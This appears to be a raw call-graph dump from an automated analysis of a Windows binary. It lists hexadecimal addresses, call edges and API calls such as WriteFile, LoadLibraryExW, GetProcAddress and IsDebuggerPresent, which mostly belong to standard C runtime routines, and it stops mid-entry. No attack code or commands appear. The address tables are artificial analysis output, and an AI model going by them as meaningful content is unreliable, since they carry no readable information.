6351->6341 6353 33a75c35 6352->6353 6354 33a75c3b 6352->6354 6356 33a75db2 6353->6356 6354->6340 6357 33a75c45 5 API calls 6356->6357 6358 33a75dd9 6357->6358 6359 33a75df1 TlsFree 6358->6359 6360 33a75de5 6358->6360 6359->6360 6361 33a72ada 5 API calls 6360->6361 6362 33a75e02 6361->6362 6362->6354 7555 33a7543d 7556 33a75440 7555->7556 7557 33a755a8 38 API calls 7556->7557 7558 33a7544c 7557->7558 6363 33a77bc7 6364 33a77bd3 6363->6364 6365 33a77c0a 6364->6365 6371 33a75671 RtlEnterCriticalSection 6364->6371 6367 33a77be7 6372 33a77f86 6367->6372 6371->6367 6373 33a77f94 6372->6373 6375 33a77bf7 6372->6375 6373->6375 6379 33a77cc2 6373->6379 6376 33a77c10 6375->6376 6493 33a756b9 RtlLeaveCriticalSection 6376->6493 6378 33a77c17 6378->6365 6380 33a77d42 6379->6380 6383 33a77cd8 6379->6383 6382 33a7571e 20 API calls 6380->6382 6405 33a77d90 6380->6405 6384 33a77d64 6382->6384 6383->6380 6385 33a77d0b 6383->6385 6389 33a7571e 20 API calls 6383->6389 6386 33a7571e 20 API calls 6384->6386 6393 33a7571e 20 API calls 6385->6393 6406 33a77d2d 6385->6406 6387 33a77d77 6386->6387 6392 33a7571e 20 API calls 6387->6392 6388 33a7571e 20 API calls 6394 33a77d37 6388->6394 6391 33a77d00 6389->6391 6390 33a77d9e 6395 33a77dfe 6390->6395 6404 33a7571e 20 API calls 6390->6404 6407 33a790ba 6391->6407 6397 33a77d85 6392->6397 6398 33a77d22 6393->6398 6399 33a7571e 20 API calls 6394->6399 6400 33a7571e 20 API calls 6395->6400 6402 33a7571e 20 API calls 6397->6402 6435 33a791b8 6398->6435 6399->6380 6401 33a77e04 6400->6401 6401->6375 6402->6405 6404->6390 6447 33a77e35 6405->6447 6406->6388 6408 33a790cb 6407->6408 6434 33a791b4 6407->6434 6409 33a790dc 6408->6409 6410 33a7571e 20 API calls 6408->6410 6411 33a790ee 6409->6411 6412 33a7571e 20 API calls 6409->6412 6410->6409 6413 33a7571e 20 API calls 6411->6413 6414 33a79100 6411->6414 6412->6411 6413->6414 6416 33a79112 6414->6416 6417 33a7571e 20 API calls 6414->6417 6415 33a79124 6419 33a79136 6415->6419 6420 33a7571e 20 API calls 6415->6420 6416->6415 6418 33a7571e 20 API calls 6416->6418 6417->6416 6418->6415 6421 33a79148 6419->6421 6422 33a7571e 20 API calls 6419->6422 6420->6419 6423 33a7915a 6421->6423 6425 33a7571e 20 API calls 6421->6425 6422->6421 6424 33a7916c 6423->6424 6426 33a7571e 20 API calls 6423->6426 6427 33a7917e 6424->6427 6428 33a7571e 20 API calls 6424->6428 6425->6423 6426->6424 6429 33a79190 6427->6429 6430 33a7571e 20 API calls 6427->6430 6428->6427 6431 33a791a2 6429->6431 6432 33a7571e 20 API calls 6429->6432 6430->6429 6433 33a7571e 20 API calls 6431->6433 6431->6434 6432->6431 6433->6434 6434->6385 6436 33a791c5 6435->6436 6446 33a7921d 6435->6446 6437 33a7571e 20 API calls 6436->6437 6438 33a791d5 6436->6438 6437->6438 6439 33a791e7 6438->6439 6440 33a7571e 20 API calls 6438->6440 6441 33a791f9 6439->6441 6442 33a7571e 20 API calls 6439->6442 6440->6439 6443 33a7920b 6441->6443 6444 33a7571e 20 API calls 6441->6444 6442->6441 6445 33a7571e 20 API calls 6443->6445 6443->6446 6444->6443 6445->6446 6446->6406 6448 33a77e60 6447->6448 6449 33a77e42 6447->6449 6448->6390 6449->6448 6453 33a7925d 6449->6453 6452 33a7571e 20 API calls 6452->6448 6454 33a77e5a 6453->6454 6455 33a7926e 6453->6455 6454->6452 6489 33a79221 6455->6489 6458 33a79221 20 API calls 6459 33a79281 6458->6459 6460 33a79221 20 API calls 6459->6460 6461 33a7928c 6460->6461 6462 33a79221 20 API calls 6461->6462 6463 33a79297 6462->6463 6464 33a79221 20 API calls 6463->6464 6465 33a792a5 6464->6465 6466 33a7571e 20 API calls 6465->6466 6467 33a792b0 6466->6467 6468 33a7571e 20 API calls 6467->6468 6469 33a792bb 6468->6469 6470 33a7571e 20 API calls 6469->6470 6471 33a792c6 6470->6471 6472 33a79221 20 API calls 6471->6472 6473 33a792d4 6472->6473 6474 33a79221 20 API calls 6473->6474 6475 33a792e2 6474->6475 6476 33a79221 20 API calls 6475->6476 6477 33a792f3 6476->6477 6478 33a79221 20 API calls 6477->6478 6479 33a79301 6478->6479 6480 33a79221 20 API calls 6479->6480 6481 33a7930f 6480->6481 6482 33a7571e 20 API calls 6481->6482 6483 33a7931a 6482->6483 6484 33a7571e 20 API calls 6483->6484 6485 33a79325 6484->6485 6486 33a7571e 20 API calls 6485->6486 6487 33a79330 6486->6487 6488 33a7571e 20 API calls 6487->6488 6488->6454 6490 33a79258 6489->6490 6491 33a79248 6489->6491 6490->6458 6491->6490 6492 33a7571e 20 API calls 6491->6492 6492->6491 6493->6378 6494 33a7a1c6 IsProcessorFeaturePresent 7042 33a7a945 7043 33a7a96d 7042->7043 7044 33a7a9a5 7043->7044 7045 33a7a997 7043->7045 7046 33a7a99e 7043->7046 7048 33a7aa17 21 API calls 7045->7048 7051 33a7aa00 7046->7051 7050 33a7a99c 7048->7050 7052 33a7aa20 7051->7052 7053 33a7b19b 21 API calls 7052->7053 7054 33a7a9a3 7053->7054 6959 33a75303 6962 33a750a5 6959->6962 6971 33a7502f 6962->6971 6965 33a7502f 5 API calls 6966 33a750c3 6965->6966 6975 33a75000 6966->6975 6969 33a75000 20 API calls 6970 33a750d9 6969->6970 6972 33a75048 6971->6972 6973 33a72ada 5 API calls 6972->6973 6974 33a75069 6973->6974 6974->6965 6976 33a7500d 6975->6976 6980 33a7502a 6975->6980 6977 33a75024 6976->6977 6979 33a7571e 20 API calls 6976->6979 6978 33a7571e 20 API calls 6977->6978 6978->6980 6979->6976 6980->6969 6981 33a77103 GetCommandLineA GetCommandLineW 7055 33a7af43 7056 33a7af4d 7055->7056 7057 33a7af59 7055->7057 7056->7057 7058 33a7af52 CloseHandle 7056->7058 7058->7057 7459 33a77a80 7460 33a77a8d 7459->7460 7461 33a7637b 20 API calls 7460->7461 7462 33a77aa7 7461->7462 7463 33a7571e 20 API calls 7462->7463 7464 33a77ab3 7463->7464 7465 33a7637b 20 API calls 7464->7465 7468 33a77ad9 7464->7468 7466 33a77acd 7465->7466 7469 33a7571e 20 API calls 7466->7469 7467 33a75eb7 11 API calls 7467->7468 7468->7467 7470 33a77ae5 7468->7470 7469->7468 7916 33a78640 7919 33a78657 7916->7919 7920 33a78665 7919->7920 7921 33a78679 7919->7921 7922 33a76368 20 API calls 7920->7922 7923 33a78693 7921->7923 7924 33a78681 7921->7924 7925 33a7866a 7922->7925 7929 33a754a7 38 API calls 7923->7929 7931 33a78652 7923->7931 7926 33a76368 20 API calls 7924->7926 7927 33a762ac 26 API calls 7925->7927 7928 33a78686 7926->7928 7927->7931 7930 33a762ac 26 API calls 7928->7930 7929->7931 7930->7931 7932 33a7284f 7933 33a72882 27 API calls 7932->7933 7934 33a7285d 7933->7934 7935 33a7724e GetProcessHeap 7559 33a7220c 7560 33a72215 7559->7560 7561 33a7221a 7559->7561 7565 33a722b1 7560->7565 7569 33a720db 7561->7569 7564 33a72228 7566 33a722c7 7565->7566 7568 33a722d0 7566->7568 7577 33a72264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7566->7577 7568->7561 7570 33a720e7 7569->7570 7574 33a7210b 7570->7574 7576 33a720f6 7570->7576 7578 33a71eec 7570->7578 7572 33a7216d 7573 33a71eec 50 API calls 7572->7573 7572->7576 7573->7576 7574->7572 7575 33a71eec 50 API calls 7574->7575 7574->7576 7575->7572 7576->7564 7577->7568 7579 33a71ef7 7578->7579 7580 33a71f2a 7578->7580 7581 33a71f1c 7579->7581 7582 33a71efc 7579->7582 7621 33a72049 7580->7621 7603 33a71f3f 7581->7603 7584 33a71f12 7582->7584 7585 33a71f01 7582->7585 7595 33a723ec 7584->7595 7589 33a71f06 7585->7589 7590 33a7240b 7585->7590 7589->7574 7635 33a753e5 7590->7635 7731 33a73513 7595->7731 7600 33a72408 7600->7589 7601 33a7351e 7 API calls 7602 33a723f5 7601->7602 7602->7589 7604 33a71f4b 7603->7604 7749 33a7247c 7604->7749 7606 33a71f57 7606->7589 7607 33a71f52 7607->7606 7608 33a72041 7607->7608 7609 33a71f7c 7607->7609 7772 33a72639 IsProcessorFeaturePresent 7608->7772 7760 33a723de 7609->7760 7612 33a72048 7613 33a71f8b 7613->7606 7763 33a722fc RtlInitializeSListHead 7613->7763 7615 33a71f99 7764 33a746c5 7615->7764 7619 33a71fb8 7619->7606 7620 33a74669 5 API calls 7619->7620 7620->7606 7623 33a72055 7621->7623 7622 33a7205e 7622->7589 7623->7622 7624 33a720d3 7623->7624 7625 33a7207d 7623->7625 7626 33a72639 4 API calls 7624->7626 7824 33a7244c 7625->7824 7628 33a720da 7626->7628 7629 33a72082 7833 33a72308 7629->7833 7631 33a72087 7836 33a720c4 7631->7836 7633 33a7209f 7839 33a7260b 7633->7839 7641 33a75aca 7635->7641 7638 33a7351e 7715 33a73820 7638->7715 7640 33a72415 7640->7589 7642 33a72410 7641->7642 7643 33a75ad4 7641->7643 7642->7638 7644 33a75e08 11 API calls 7643->7644 7645 33a75adb 7644->7645 7645->7642 7646 33a75e5e 11 API calls 7645->7646 7647 33a75aee 7646->7647 7649 33a759b5 7647->7649 7650 33a759d0 7649->7650 7651 33a759c0 7649->7651 7650->7642 7655 33a759d6 7651->7655 7654 33a7571e 20 API calls 7654->7650 7656 33a759ef 7655->7656 7657 33a759e9 7655->7657 7659 33a7571e 20 API calls 7656->7659 7658 33a7571e 20 API calls 7657->7658 7658->7656 7660 33a759fb 7659->7660 7661 33a7571e 20 API calls 7660->7661 7662 33a75a06 7661->7662 7663 33a7571e 20 API calls 7662->7663 7664 33a75a11 7663->7664 7665 33a7571e 20 API calls 7664->7665 7666 33a75a1c 7665->7666 7667 33a7571e 20 API calls 7666->7667 7668 33a75a27 7667->7668 7669 33a7571e 20 API calls 7668->7669 7670 33a75a32 7669->7670 7671 33a7571e 20 API calls 7670->7671 7672 33a75a3d 7671->7672 7673 33a7571e 20 API calls 7672->7673 7674 33a75a48 7673->7674 7675 33a7571e 20 API calls 7674->7675 7676 33a75a56 7675->7676 7681 33a7589c 7676->7681 7687 33a757a8 7681->7687 7683 33a758c0 7684 33a758ec 7683->7684 7699 33a75809 7684->7699 7686 33a75910 7686->7654 7688 33a757b4 7687->7688 7695 33a75671 RtlEnterCriticalSection 7688->7695 7691 33a757be 7692 33a7571e 20 API calls 7691->7692 7694 33a757e8 7691->7694 7692->7694 7693 33a757f5 7693->7683 7696 33a757fd 7694->7696 7695->7691 7697 33a756b9 RtlLeaveCriticalSection 7696->7697 7698 33a75807 7697->7698 7698->7693 7700 33a75815 7699->7700 7707 33a75671 RtlEnterCriticalSection 7700->7707 7702 33a7581f 7708 33a75a7f 7702->7708 7704 33a75832 7712 33a75848 7704->7712 7706 33a75840 7706->7686 7707->7702 7709 33a75a8e 7708->7709 7711 33a75ab5 7708->7711 7710 33a77cc2 20 API calls 7709->7710 7709->7711 7710->7711 7711->7704 7713 33a756b9 RtlLeaveCriticalSection 7712->7713 7714 33a75852 7713->7714 7714->7706 7716 33a7384b 7715->7716 7717 33a7382d 7715->7717 7716->7640 7720 33a7383b 7717->7720 7721 33a73b67 7717->7721 7726 33a73ba2 7720->7726 7722 33a73a82 5 API calls 7721->7722 7723 33a73b81 7722->7723 7724 33a73b99 TlsGetValue 7723->7724 7725 33a73b8d 7723->7725 7724->7725 7725->7720 7727 33a73a82 5 API calls 7726->7727 7728 33a73bbc 7727->7728 7729 33a73bd7 TlsSetValue 7728->7729 7730 33a73bcb 7728->7730 7729->7730 7730->7716 7737 33a73856 7731->7737 7733 33a723f1 7733->7602 7734 33a753da 7733->7734 7735 33a75b7a 20 API calls 7734->7735 7736 33a723fd 7735->7736 7736->7600 7736->7601 7738 33a73862 GetLastError 7737->7738 7739 33a7385f 7737->7739 7740 33a73b67 6 API calls 7738->7740 7739->7733 7741 33a73877 7740->7741 7742 33a738dc SetLastError 7741->7742 7743 33a73ba2 6 API calls 7741->7743 7748 33a73896 7741->7748 7742->7733 7745 33a73890 7743->7745 7744 33a738b8 7746 33a73ba2 6 API calls 7744->7746 7744->7748 7745->7744 7747 33a73ba2 6 API calls 7745->7747 7745->7748 7746->7748 7747->7744 7748->7742 7750 33a72485 7749->7750 7776 33a72933 IsProcessorFeaturePresent 7750->7776 7754 33a72496 7755 33a7249a 7754->7755 7787 33a753c8 7754->7787 7755->7607 7758 33a724b1 7758->7607 7759 33a73529 8 API calls 7759->7755 7818 33a724b5 7760->7818 7762 33a723e5 7762->7613 7763->7615 7767 33a746dc 7764->7767 7765 33a72ada 5 API calls 7766 33a71fad 7765->7766 7766->7606 7768 33a723b3 7766->7768 7767->7765 7769 33a723b8 7768->7769 7770 33a72933 IsProcessorFeaturePresent 7769->7770 7771 33a723c1 7769->7771 7770->7771 7771->7619 7773 33a7264e 7772->7773 7774 33a726f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7773->7774 7775 33a72744 7774->7775 7775->7612 7777 33a72491 7776->7777 7778 33a734ea 7777->7778 7779 33a734ef 7778->7779 7790 33a73936 7779->7790 7782 33a734fd 7782->7754 7784 33a73505 7785 33a73510 7784->7785 7786 33a73972 RtlDeleteCriticalSection 7784->7786 7785->7754 7786->7782 7814 33a77457 7787->7814 7791 33a7393f 7790->7791 7793 33a73968 7791->7793 7794 33a734f9 7791->7794 7804 33a73be0 7791->7804 7795 33a73972 RtlDeleteCriticalSection 7793->7795 7794->7782 7796 33a738e8 7794->7796 7795->7794 7809 33a73af1 7796->7809 7799 33a73ba2 6 API calls 7800 33a7390b 7799->7800 7801 33a73918 7800->7801 7802 33a7391b 6 API calls 7800->7802 7801->7784 7803 33a738fd 7802->7803 7803->7784 7805 33a73a82 5 API calls 7804->7805 7806 33a73bfa 7805->7806 7807 33a73c18 InitializeCriticalSectionAndSpinCount 7806->7807 7808 33a73c03 7806->7808 7807->7808 7808->7791 7810 33a73a82 5 API calls 7809->7810 7811 33a73b0b 7810->7811 7812 33a73b24 TlsAlloc 7811->7812 7813 33a738f2 7811->7813 7813->7799 7813->7803 7817 33a77470 7814->7817 7815 33a72ada 5 API calls 7816 33a724a3 7815->7816 7816->7758 7816->7759 7817->7815 7819 33a724c4 7818->7819 7820 33a724c8 7818->7820 7819->7762 7821 33a72639 4 API calls 7820->7821 7823 33a724d5 7820->7823 7822 33a72559 7821->7822 7823->7762 7825 33a72451 7824->7825 7826 33a72455 7825->7826 7829 33a72461 7825->7829 7827 33a7527a 20 API calls 7826->7827 7828 33a7245f 7827->7828 7828->7629 7830 33a7246e 7829->7830 7831 33a7499b 28 API calls 7829->7831 7830->7629 7832 33a74bbd 7831->7832 7832->7629 7845 33a734c7 RtlInterlockedFlushSList 7833->7845 7835 33a72312 7835->7631 7847 33a7246f 7836->7847 7838 33a720c9 7838->7633 7840 33a72617 7839->7840 7841 33a7262d 7840->7841 7855 33a753ed 7840->7855 7841->7622 7844 33a73529 8 API calls 7844->7841 7846 33a734d7 7845->7846 7846->7835 7852 33a753ff 7847->7852 7850 33a7391b 6 API calls 7851 33a7354d 7850->7851 7851->7838 7853 33a75c2b 11 API calls 7852->7853 7854 33a72476 7853->7854 7854->7850 7858 33a774da 7855->7858 7860 33a774f3 7858->7860 7859 33a72ada 5 API calls 7861 33a72625 7859->7861 7860->7859 7861->7844 7475 33a78a89 7476 33a76d60 51 API calls 7475->7476 7477 33a78a8e 7476->7477 7059 33a75348 7062 33a73529 7059->7062 7063 33a73543 7062->7063 7064 33a73532 7062->7064 7070 33a7391b 7064->7070 7071 33a73925 7070->7071 7072 33a73537 7070->7072 7082 33a73b2c 7071->7082 7074 33a73972 7072->7074 7075 33a7353c 7074->7075 7076 33a7397d 7074->7076 7078 33a73c50 7075->7078 7077 33a73987 RtlDeleteCriticalSection 7076->7077 7077->7075 7077->7077 7079 33a73c59 7078->7079 7081 33a73c7f 7078->7081 7080 33a73c69 FreeLibrary 7079->7080 7079->7081 7080->7079 7081->7063 7087 33a73a82 7082->7087 7084 33a73b46 7085 33a73b5e TlsFree 7084->7085 7086 33a73b52 7084->7086 7085->7086 7086->7072 7088 33a73aaa 7087->7088 7092 33a73aa6 7087->7092 7088->7092 7093 33a739be 7088->7093 7091 33a73ac4 GetProcAddress 7091->7092 7092->7084 7094 33a739cd 7093->7094 7095 33a739ea LoadLibraryExW 7094->7095 7097 33a73a60 FreeLibrary 7094->7097 7098 33a73a77 7094->7098 7099 33a73a38 LoadLibraryExW 7094->7099 7095->7094 7096 33a73a05 GetLastError 7095->7096 7096->7094 7097->7094 7098->7091 7098->7092 7099->7094 7100 33a77b48 7110 33a78ebf 7100->7110 7104 33a77b55 7123 33a7907c 7104->7123 7107 33a77b7f 7108 33a7571e 20 API calls 7107->7108 7109 33a77b8a 7108->7109 7127 33a78ec8 7110->7127 7112 33a77b50 7113 33a78fdc 7112->7113 7114 33a78fe8 7113->7114 7147 33a75671 RtlEnterCriticalSection 7114->7147 7116 33a7905e 7161 33a79073 7116->7161 7117 33a78ff3 7117->7116 7119 33a79032 RtlDeleteCriticalSection 7117->7119 7148 33a7a09c 7117->7148 7122 33a7571e 20 API calls 7119->7122 7120 33a7906a 7120->7104 7122->7117 7124 33a77b64 RtlDeleteCriticalSection 7123->7124 7125 33a79092 7123->7125 7124->7104 7124->7107 7125->7124 7126 33a7571e 20 API calls 7125->7126 7126->7124 7128 33a78ed4 7127->7128 7137 33a75671 RtlEnterCriticalSection 7128->7137 7130 33a78f77 7142 33a78f97 7130->7142 7133 33a78f83 7133->7112 7135 33a78ee3 7135->7130 7136 33a78e78 66 API calls 7135->7136 7138 33a77b94 RtlEnterCriticalSection 7135->7138 7139 33a78f6d 7135->7139 7136->7135 7137->7135 7138->7135 7145 33a77ba8 RtlLeaveCriticalSection 7139->7145 7141 33a78f75 7141->7135 7146 33a756b9 RtlLeaveCriticalSection 7142->7146 7144 33a78f9e 7144->7133 7145->7141 7146->7144 7147->7117 7149 33a7a0a8 7148->7149 7150 33a7a0ce 7149->7150 7151 33a7a0b9 7149->7151 7160 33a7a0c9 7150->7160 7164 33a77b94 RtlEnterCriticalSection 7150->7164 7152 33a76368 20 API calls 7151->7152 7153 33a7a0be 7152->7153 7155 33a762ac 26 API calls 7153->7155 7155->7160 7156 33a7a0ea 7165 33a7a026 7156->7165 7158 33a7a0f5 7181 33a7a112 7158->7181 7160->7117 7429 33a756b9 RtlLeaveCriticalSection 7161->7429 7163 33a7907a 7163->7120 7164->7156 7166 33a7a033 7165->7166 7167 33a7a048 7165->7167 7168 33a76368 20 API calls 7166->7168 7173 33a7a043 7167->7173 7184 33a78e12 7167->7184 7169 33a7a038 7168->7169 7171 33a762ac 26 API calls 7169->7171 7171->7173 7173->7158 7174 33a7907c 20 API calls 7175 33a7a064 7174->7175 7190 33a77a5a 7175->7190 7177 33a7a06a 7197 33a7adce 7177->7197 7180 33a7571e 20 API calls 7180->7173 7428 33a77ba8 RtlLeaveCriticalSection 7181->7428 7183 33a7a11a 7183->7160 7185 33a78e2a 7184->7185 7186 33a78e26 7184->7186 7185->7186 7187 33a77a5a 26 API calls 7185->7187 7186->7174 7188 33a78e4a 7187->7188 7212 33a79a22 7188->7212 7191 33a77a66 7190->7191 7192 33a77a7b 7190->7192 7193 33a76368 20 API calls 7191->7193 7192->7177 7194 33a77a6b 7193->7194 7195 33a762ac 26 API calls 7194->7195 7196 33a77a76 7195->7196 7196->7177 7198 33a7addd 7197->7198 7200 33a7adf2 7197->7200 7199 33a76355 20 API calls 7198->7199 7203 33a7ade2 7199->7203 7201 33a7ae2d 7200->7201 7206 33a7ae19 7200->7206 7202 33a76355 20 API calls 7201->7202 7204 33a7ae32 7202->7204 7205 33a76368 20 API calls 7203->7205 7208 33a76368 20 API calls 7204->7208 7209 33a7a070 7205->7209 7385 33a7ada6 7206->7385 7210 33a7ae3a 7208->7210 7209->7173 7209->7180 7211 33a762ac 26 API calls 7210->7211 7211->7209 7213 33a79a2e 7212->7213 7214 33a79a36 7213->7214 7215 33a79a4e 7213->7215 7237 33a76355 7214->7237 7216 33a79aec 7215->7216 7221 33a79a83 7215->7221 7219 33a76355 20 API calls 7216->7219 7222 33a79af1 7219->7222 7220 33a76368 20 API calls 7234 33a79a43 7220->7234 7240 33a78c7b RtlEnterCriticalSection 7221->7240 7224 33a76368 20 API calls 7222->7224 7226 33a79af9 7224->7226 7225 33a79a89 7227 33a79aa5 7225->7227 7228 33a79aba 7225->7228 7229 33a762ac 26 API calls 7226->7229 7230 33a76368 20 API calls 7227->7230 7241 33a79b0d 7228->7241 7229->7234 7233 33a79aaa 7230->7233 7232 33a79ab5 7292 33a79ae4 7232->7292 7235 33a76355 20 API calls 7233->7235 7234->7186 7235->7232 7238 33a75b7a 20 API calls 7237->7238 7239 33a7635a 7238->7239 7239->7220 7240->7225 7242 33a79b3b 7241->7242 7280 33a79b34 7241->7280 7243 33a79b3f 7242->7243 7244 33a79b5e 7242->7244 7246 33a76355 20 API calls 7243->7246 7247 33a79baf 7244->7247 7248 33a79b92 7244->7248 7245 33a72ada 5 API calls 7249 33a79d15 7245->7249 7250 33a79b44 7246->7250 7252 33a79bc5 7247->7252 7295 33a7a00b 7247->7295 7251 33a76355 20 API calls 7248->7251 7249->7232 7253 33a76368 20 API calls 7250->7253 7255 33a79b97 7251->7255 7298 33a796b2 7252->7298 7257 33a79b4b 7253->7257 7260 33a76368 20 API calls 7255->7260 7258 33a762ac 26 API calls 7257->7258 7258->7280 7263 33a79b9f 7260->7263 7261 33a79bd3 7264 33a79bd7 7261->7264 7265 33a79bf9 7261->7265 7262 33a79c0c 7267 33a79c66 WriteFile 7262->7267 7268 33a79c20 7262->7268 7266 33a762ac 26 API calls 7263->7266 7269 33a79ccd 7264->7269 7305 33a79645 7264->7305 7310 33a79492 GetConsoleCP 7265->7310 7266->7280 7271 33a79c89 GetLastError 7267->7271 7278 33a79bef 7267->7278 7272 33a79c56 7268->7272 7273 33a79c28 7268->7273 7269->7280 7281 33a76368 20 API calls 7269->7281 7271->7278 7336 33a79728 7272->7336 7274 33a79c46 7273->7274 7275 33a79c2d 7273->7275 7328 33a798f5 7274->7328 7275->7269 7321 33a79807 7275->7321 7278->7269 7278->7280 7284 33a79ca9 7278->7284 7280->7245 7283 33a79cf2 7281->7283 7287 33a76355 20 API calls 7283->7287 7285 33a79cc4 7284->7285 7286 33a79cb0 7284->7286 7343 33a76332 7285->7343 7288 33a76368 20 API calls 7286->7288 7287->7280 7290 33a79cb5 7288->7290 7291 33a76355 20 API calls 7290->7291 7291->7280 7384 33a78c9e RtlLeaveCriticalSection 7292->7384 7294 33a79aea 7294->7234 7348 33a79f8d 7295->7348 7370 33a78dbc 7298->7370 7300 33a796c2 7301 33a796c7 7300->7301 7302 33a75af6 38 API calls 7300->7302 7301->7261 7301->7262 7303 33a796ea 7302->7303 7303->7301 7304 33a79708 GetConsoleMode 7303->7304 7304->7301 7308 33a7969f 7305->7308 7309 33a7966a 7305->7309 7306 33a796a1 GetLastError 7306->7308 7307 33a7a181 WriteConsoleW CreateFileW 7307->7309 7308->7278 7309->7306 7309->7307 7309->7308 7311 33a794f5 7310->7311 7320 33a79607 7310->7320 7315 33a7957b WideCharToMultiByte 7311->7315 7317 33a779e6 40 API calls 7311->7317 7319 33a795d2 WriteFile 7311->7319 7311->7320 7379 33a77c19 7311->7379 7312 33a72ada 5 API calls 7314 33a79641 7312->7314 7314->7278 7316 33a795a1 WriteFile 7315->7316 7315->7320 7316->7311 7318 33a7962a GetLastError 7316->7318 7317->7311 7318->7320 7319->7311 7319->7318 7320->7312 7322 33a79816 7321->7322 7323 33a798d8 7322->7323 7325 33a79894 WriteFile 7322->7325 7324 33a72ada 5 API calls 7323->7324 7326 33a798f1 7324->7326 7325->7322 7327 33a798da GetLastError 7325->7327 7326->7278 7327->7323 7335 33a79904 7328->7335 7329 33a79a0f 7330 33a72ada 5 API calls 7329->7330 7331 33a79a1e 7330->7331 7331->7278 7332 33a79986 WideCharToMultiByte 7333 33a79a07 GetLastError 7332->7333 7334 33a799bb WriteFile 7332->7334 7333->7329 7334->7333 7334->7335 7335->7329 7335->7332 7335->7334 7337 33a79737 7336->7337 7338 33a797ea 7337->7338 7340 33a797a9 WriteFile 7337->7340 7339 33a72ada 5 API calls 7338->7339 7341 33a79803 7339->7341 7340->7337 7342 33a797ec GetLastError 7340->7342 7341->7278 7342->7338 7344 33a76355 20 API calls 7343->7344 7345 33a7633d 7344->7345 7346 33a76368 20 API calls 7345->7346 7347 33a76350 7346->7347 7347->7280 7357 33a78d52 7348->7357 7350 33a79f9f 7351 33a79fa7 7350->7351 7352 33a79fb8 SetFilePointerEx 7350->7352 7353 33a76368 20 API calls 7351->7353 7354 33a79fd0 GetLastError 7352->7354 7355 33a79fac 7352->7355 7353->7355 7356 33a76332 20 API calls 7354->7356 7355->7252 7356->7355 7358 33a78d74 7357->7358 7359 33a78d5f 7357->7359 7361 33a76355 20 API calls 7358->7361 7363 33a78d99 7358->7363 7360 33a76355 20 API calls 7359->7360 7362 33a78d64 7360->7362 7364 33a78da4 7361->7364 7365 33a76368 20 API calls 7362->7365 7363->7350 7366 33a76368 20 API calls 7364->7366 7367 33a78d6c 7365->7367 7368 33a78dac 7366->7368 7367->7350 7369 33a762ac 26 API calls 7368->7369 7369->7367 7371 33a78dd6 7370->7371 7372 33a78dc9 7370->7372 7374 33a76368 20 API calls 7371->7374 7376 33a78de2 7371->7376 7373 33a76368 20 API calls 7372->7373 7375 33a78dce 7373->7375 7377 33a78e03 7374->7377 7375->7300 7376->7300 7378 33a762ac 26 API calls 7377->7378 7378->7375 7380 33a75af6 38 API calls 7379->7380 7381 33a77c24 7380->7381 7382 33a77a00 38 API calls 7381->7382 7383 33a77c34 7382->7383 7383->7311 7384->7294 7388 33a7ad24 7385->7388 7387 33a7adca 7387->7209 7389 33a7ad30 7388->7389 7399 33a78c7b RtlEnterCriticalSection 7389->7399 7391 33a7ad3e 7392 33a7ad65 7391->7392 7393 33a7ad70 7391->7393 7400 33a7ae4d 7392->7400 7395 33a76368 20 API calls 7393->7395 7396 33a7ad6b 7395->7396 7415 33a7ad9a 7396->7415 7398 33a7ad8d 7398->7387 7399->7391 7401 33a78d52 26 API calls 7400->7401 7403 33a7ae5d 7401->7403 7402 33a7ae63 7418 33a78cc1 7402->7418 7403->7402 7405 33a7ae95 7403->7405 7408 33a78d52 26 API calls 7403->7408 7405->7402 7406 33a78d52 26 API calls 7405->7406 7409 33a7aea1 CloseHandle 7406->7409 7411 33a7ae8c 7408->7411 7409->7402 7413 33a7aead GetLastError 7409->7413 7410 33a7aedd 7410->7396 7412 33a78d52 26 API calls 7411->7412 7412->7405 7413->7402 7414 33a76332 20 API calls 7414->7410 7427 33a78c9e RtlLeaveCriticalSection 7415->7427 7417 33a7ada4 7417->7398 7419 33a78d37 7418->7419 7420 33a78cd0 7418->7420 7421 33a76368 20 API calls 7419->7421 7420->7419 7426 33a78cfa 7420->7426 7422 33a78d3c 7421->7422 7423 33a76355 20 API calls 7422->7423 7424 33a78d27 7423->7424 7424->7410 7424->7414 7425 33a78d21 SetStdHandle 7425->7424 7426->7424 7426->7425 7427->7417 7428->7183 7429->7163 7482 33a74ed7 7483 33a76d60 51 API calls 7482->7483 7484 33a74ee9 7483->7484 7493 33a77153 GetEnvironmentStringsW 7484->7493 7487 33a74ef4 7489 33a7571e 20 API calls 7487->7489 7490 33a74f29 7489->7490 7491 33a74eff 7492 33a7571e 20 API calls 7491->7492 7492->7487 7494 33a7716a 7493->7494 7495 33a771bd 7493->7495 7498 33a77170 WideCharToMultiByte 7494->7498 7496 33a771c6 FreeEnvironmentStringsW 7495->7496 7497 33a74eee 7495->7497 7496->7497 7497->7487 7505 33a74f2f 7497->7505 7498->7495 7499 33a7718c 7498->7499 7500 33a756d0 21 API calls 7499->7500 7501 33a77192 7500->7501 7502 33a771af 7501->7502 7503 33a77199 WideCharToMultiByte 7501->7503 7504 33a7571e 20 API calls 7502->7504 7503->7502 7504->7495 7506 33a74f44 7505->7506 7507 33a7637b 20 API calls 7506->7507 7517 33a74f6b 7507->7517 7508 33a74fcf 7509 33a7571e 20 API calls 7508->7509 7510 33a74fe9 7509->7510 7510->7491 7511 33a7637b 20 API calls 7511->7517 7512 33a74fd1 7514 33a75000 20 API calls 7512->7514 7515 33a74fd7 7514->7515 7518 33a7571e 20 API calls 7515->7518 7516 33a74ff3 7519 33a762bc 11 API calls 7516->7519 7517->7508 7517->7511 7517->7512 7517->7516 7520 33a7571e 20 API calls 7517->7520 7522 33a7544d 7517->7522 7518->7508 7521 33a74fff 7519->7521 7520->7517 7523 33a75468 7522->7523 7524 33a7545a 7522->7524 7525 33a76368 20 API calls 7523->7525 7524->7523 7529 33a7547f 7524->7529 7526 33a75470 7525->7526 7527 33a762ac 26 API calls 7526->7527 7528 33a7547a 7527->7528 7528->7517 7529->7528 7530 33a76368 20 API calls 7529->7530 7530->7526 6495 33a773d5 6496 33a773e1 6495->6496 6507 33a75671 RtlEnterCriticalSection 6496->6507 6498 33a773e8 6508 33a78be3 6498->6508 6500 33a773f7 6506 33a77406 6500->6506 6521 33a77269 GetStartupInfoW 6500->6521 6504 33a77417 6532 33a77422 6506->6532 6507->6498 6509 33a78bef 6508->6509 6510 33a78c13 6509->6510 6511 33a78bfc 6509->6511 6535 33a75671 RtlEnterCriticalSection 6510->6535 6512 33a76368 